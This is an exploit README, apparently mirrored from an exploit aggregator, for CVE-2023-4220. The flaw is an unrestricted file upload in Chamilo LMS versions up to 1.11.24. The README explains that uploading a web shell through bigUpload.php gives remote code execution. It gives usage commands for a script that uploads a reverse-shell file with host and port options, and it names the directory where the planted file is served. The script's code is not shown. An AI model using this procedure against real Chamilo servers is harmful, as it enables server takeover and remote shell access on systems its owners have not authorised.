## https://sploitus.com/exploit?id=4CABC303-DBB4-5F0E-9950-AB48D3771B2A
# Chamilo-LMS-CVE-2023-4220-Exploit
This is an Exploit for Unrestricted file upload in big file upload functionality in Chamilo-LMS for this location `/main/inc/lib/javascript/bigupload/inc/bigUpload.php` in Chamilo LMS <= v1.11.24, and Attackers can obtain remote code execution via uploading of web shell. Then it will allows arbitrary files to be uploaded to /main/inc/lib/javascript/bigupload/files directory.
# Vulnerability POC
-You Can at first run the exploit to know how to use it like that:
```ruby
chmod +x CVE-2023-4220.sh
./CVE-2023-4220.sh
```

-Then you need to enter the requeierd inputs like that:
```ruby
~$ ./CVE-2023-4220.sh -f reverse_file -h host_link -p port_in_the_reverse_file
```

-Here we can found the uploaded file in the server
```ruby
http://target.test/main/inc/lib/javascript/bigupload/files/
```
